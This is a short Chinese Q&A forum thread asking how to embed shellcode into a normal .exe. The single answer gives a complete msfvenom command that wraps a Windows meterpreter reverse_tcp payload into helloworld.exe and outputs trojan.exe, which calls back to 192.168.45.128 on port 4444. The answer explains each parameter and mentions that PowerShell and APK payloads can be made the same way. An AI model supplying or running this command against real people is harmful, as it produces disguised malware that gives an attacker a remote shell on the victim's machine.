【网络安全一百问-98】如何把shellcode嵌入到正常exe中?

请先 登录 后评论

1 个回答

空城 - 安全小菜鸡

metasploit就可以

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.128 LPORT=4444 -x helloworld.exe -f exe -o trojan.exe

就是使用的载荷(payload)为windows/meterpreter/reverse_tcp

运行后回连192.168.45.128的4444端口,原程序为helloworld.exe,输出带有木马的程序,名称为trojan.exe。

msf还可以生成ps脚本文件、apk文件等


请先 登录 后评论

相似问题